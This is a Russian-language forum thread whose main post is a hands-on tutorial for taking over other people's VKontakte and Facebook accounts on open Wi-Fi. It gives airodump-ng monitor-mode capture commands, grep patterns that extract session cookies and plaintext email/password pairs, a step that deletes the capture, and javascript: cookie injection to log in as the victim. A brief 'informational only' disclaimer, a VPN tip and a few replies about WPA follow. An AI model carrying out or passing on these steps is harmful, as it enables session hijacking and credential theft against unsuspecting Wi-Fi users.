Взлом Вконтакте через открытую сеть Wi-Fi

рой

Старейшина
Репутация
110 / 464
image001r.png


Здравствуйте, и с вами снова я Libert. Решил порадовать вас еще одной простецкой статьёй по взлому аудиту.

В данной статье речь пойдёт о всеми известной из данной темы утилите, под названием Aircrack, а в частности её инструменту Airodump, так же для полного счастья нам понадобится браузер Опера или Феннек, т.к. МикроБ почему-то странно себя ведёт, ниже объясню почему. А еще нам не обойтись без утилиты под названием grep. Итак приступим!
Теория

Кто-нибудь из вас задумывался, а почему введя пароль 1 раз, вам не нужно вводить его на сайте снова? Бывает и полгода пройдёт, а вы на сайте? Этому феномену есть простое объяснение – кукки.

Cookies – небольшой кусочек данных, который каждый раз отправляется клиентом(вашим браузером) серверу. Что содержит этот кусочек? Да всё что угодно, пароли, формы, «корзину покупок» в интернет магазинах, «сравнение товаров» на яндекc маркете и т.д. и т.п. Каждый раз заходя на сайт в контакте, сервер спрашивает «кто ты?» и в ответ мы говорим примерно следующее, я «a5637cf34dd32a7b31b47c3887d539c4f99b3e737818e1b17b8da68d». И вот в этом букво-цифренном наборе и кроется ваш логин и пароль. Если этого кукки нет, сервер предлагает представиться с помощью форм «Логин» и «пароль».

Итак, разобравшись что такое кукки нужно разобраться, а как мы будем взламывать пароль? А никак, удивлены? Тут всё гораздо проще, мы просто украдём сессию.

Итак сессия – период работы клиента с сервером. Период может быть ограниченный по времени и не ограниченный, с условиями или без. То есть кукки может записаться на 15 или 30 минут, после чего будет недействителен или быть записанным только до выключения браузера (вспомнили галочку на почте и в контакте «Чужой компьютер?»).

Так вот мы и будем воровать эту сессию, но откуда? Воровать можно с открытых Wi-Fi сетей, чем мы и займёмся. Тут нам в помощь может придти кафешки типа кофехаус или старбокс или банально тот-же Макдоналдс, где есть бесплатный файфай.

Для того чтобы украсть куккис, нужно поймать его, для этого мы используем утилиту Airdump-ng. А чтобы из всего мусора, что придёт к нам на телефон по вайфаю поймать именно куккис используем программу grep.

Что такое греп? Поисковик, обычный жадный поисковик, который будет искать нужный нам куккис в куче мусора, что мы поймаем.
Практика

Для начала у кого нет-устанавливаем репозитории Extras-devel и Extras-testing. Если не знаете как, учитесь азам линукса и н900, данная статья еще рановата для вас.

После ставим grap и aircrack-ng:

Root

#Apt-get install aircrack-ng grep-gnu

(так же можно поставить и то и то через диспетчер приложений)

После начинаем взлом, для этого нам понадобится перевести телефон в режим монитора сетей wi-fi

image003v.png


#ifconfig wlan0 down

#iwconfig wlan0 mode Monitor

#ifconfig wlan0 up

Если на этом этапе всё проделано верно, у вас должны исчезнуть из списка сетей все Wi-Fi сети.

Далее начинаем смотреть airodump-ом есть ли в радиусе действия незапароленные сети

image005u.png


#airodump-ng wlan0

Останавливаем нажатием ctrl+с

Итак, мы видим одну единственную сеть, у которой в графе ENC стоит OPN что означает, что это открытая сеть, далее начинаем запись нужных нам файлов для последующего поиска кукисов.

#airodump-ng wlan0 –output-format pcap –w vzlom

image007l.png


Ключ –output-format позволяет нам записать именно нужные файлы в формате pcap, а ключ w отвечает за саму запись.

Далее не выключая airodamp набираем, а лучше заранее копируем на телефон конфиг для поиска grep-a

#tail -f vzlom-01.cap | cat | grep -aEo « c_user=[0-9]+|sid=[0-9]{1,5}|xs=[0-9a-f]{32} |email=[^&]+&pass=[^ ]+» для фейсбука

#tail -f vzlom-01.cap | cat | grep -aEo «remixsid=[0-9a-f]+|l=[0-9]{3,12}|p=[0-9a-f]{36}|email=[^&]+&pass=[^ ]+» для контакта

внимание, аирдамп прибавляет к названию «-01», а если запускать 2 раза «-02», а если 3 раза «-03» и т.д. смотрите внимательней.

image009so.png


И спустя некоторое время мы видим кукисы! Ура, перехватили товарисчи! Кукисом является всё после слова remixsid в случае с контактом.

Далее нам нужно почистить за собой весь мусор, набираем в консольке

#rm vzlom-01.cap (или 02,03 и т.п.)

#ifconfig wlan0 down

#iwconfig wlan0 mode manual

#ifconfig wlan0 up

Всё вайфай включён, мусор почищен, подключаемся к GPRS или к открытому вайфаю.

Но как нам подменить кукисы?

Тут на помощь приходит опера, поскольку МикроБ упорно отказывается перписывать кукис (в первый раз такое вижу), а просто добавляет повторное значение в конец (WTF?!!!) Но к счастью у нас есть опера и мозила. Я больше поклонник оперы, поэтому показываю на ее примере.

Заходим в контакт под своим логином и паролем, а после набираем в адресной строке следующее:

java script:document.write(document.cookie);

image011e.png


И видим среди прочих строчек свой собственный куккис, но мы на этом не останавливаемся и вводим далее

java script:document.cookie=” remixsid =значение отловленное grep”;

image013b.png


Ну и после снова вводим

java script:document.write(document.cookie);

И видим вот такую картину

image015z.png


ну а после закрываем вкладу и заново заходим в контакт, всё, мы на чужом аккаунте!

image017c.png


Заключение

Как мы только что убедились-открытые вайфай сети-катастрофа. Отсутствие шифрования страницы входа в контакте-огромная тупость Дурова и администрации в общем. Ну и мы видим как легко взломать чужой контакт в таком случае. Чтобы вы не попадались на это, и вас не взламывали, пользуйтесь сервисами VPN. Что это такое-можете спросить у гула. И снова повторюсь, эта статья, ТОЛЬКО в ознакомительных целях, взлом кого-либо уголовно наказуем (ст. 272 УК РФ)

Так-же по теме:

Взлом Wi-Fi WEP шифрования

Взлом Windows XP SP3 с N900

В скором времени напишу как взламывать Wi-Fi WPA сети.

Всего наилучшего,

Копирайт
 
Как я понимаю перехватит куки можно только с Wifi с WEP шифрованием или открытой, с WPA, WPA2 этот фокус не пройдет?!
 
Как я понимаю перехватит куки можно только с Wifi с WEP шифрованием или открытой, с WPA, WPA2 этот фокус не пройдет?!
ну.. я так думаю точней уверен на 99 % что не проидёт )WPA и WPA2 (Wi-Fi Protected Access) — представляет собой обновленную программу сертификации устройств беспроводной связи. Технология WPA пришла на замену технологии защиты беспроводных сетей WEP. Плюсами WPA являются усиленная безопасность данных и ужесточенный контроль доступа к беспроводным сетям. Немаловажной характеристикой является совместимость между множеством беспроводных устройств как на аппаратном уровне, так и на программном. На данный момент WPA и WPA2 разрабатываются и продвигаются организацией Wi-Fi Alliance.
 
Крута спасибо за интересный рассказ
 
<div class='moddiv'><TABLE cellpadding='0' cellspacing='0' border='0'><TD align='middle' vAlign='center' width="1%" style='background-color: #6060ff; color: #ffffff; font-family: Times New Roman, Serif; font-size: 50px; font-weight: bold;' title='Предупреждение'> i </TD><TD width='6px'>
</TD><TD vAlign='middle'>
Нарушения правил!
http://dapf.ru/index.php?showtopic=20305&a...mp;#entry117128

 
</TD></TABLE>

p.s Если кто с модеров посмотрит дайте бан 3 дня. Удалите мой пост
 
Может подобные казусы научат людей ставить галочку "чужой компьютер". И разлогиниваться. Всегда разлогиниваться.
 
Сверху